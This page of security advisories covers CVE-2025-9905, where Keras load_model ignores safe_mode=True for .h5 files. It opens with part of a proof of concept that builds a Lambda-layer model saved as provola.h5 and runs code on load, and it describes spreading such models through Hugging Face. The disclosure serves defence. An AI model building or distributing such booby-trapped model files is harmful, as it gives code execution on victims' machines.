keras.Sequential()\nmodel.add(keras.layers.Input(shape=(1,)))\nmodel.add(keras.layers.Lambda(f))\nmodel.compile()\n\nkeras.saving.save_model(model, \"./provola.h5\")\n```\n\nFrom the victim\u2019s side, triggering code execution is just as simple:\n\n```python\nimport keras\n\nmodel = keras.models.load_model(\"./provola.h5\", safe_mode=True)\n```\n\nThat\u2019s all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.\n\n\nAs expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.\n\n## Attack scenario\n\nThe attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model\u2014*even with* `safe_mode=True` that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.\n\nOnce the model is loaded, the attacker gains the ability to execute arbitrary code on the victim\u2019s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.",
  "id": "GHSA-36rr-ww3j-vrjv",
  "modified": "2025-09-19T20:12:05Z",
  "published": "2025-09-19T20:12:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded."
}

ghsa-77wq-646f-jrm2

Vulnerability from github

Published

2025-09-19 09:31

Modified

2025-09-19 17:34

Severity ?

7.3 (High) - CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.

Original Description

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.

One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.

This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.

Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-19T17:34:15Z",
    "nvd_published_at": "2025-09-19T09:15:36Z",
    "severity": "HIGH"
  },
  "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.\n\n### Original Description\nThe Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
  "id": "GHSA-77wq-646f-jrm2",
  "modified": "2025-09-19T17:34:15Z",
  "published": "2025-09-19T09:31:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.",
  "withdrawn": "2025-09-19T17:34:15Z"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-9905 (GCVE-0-2025-9905)

Vulnerability from cvelistv5

fkie_cve-2025-9905

Vulnerability from fkie_nvd

ghsa-36rr-ww3j-vrjv

Vulnerability from github

Summary

Details

Intended behaviour

Technical Details

Solution

PoC

Attack scenario

ghsa-77wq-646f-jrm2

Vulnerability from github

Duplicate Advisory

Original Description

Tags

Sightings

Nomenclature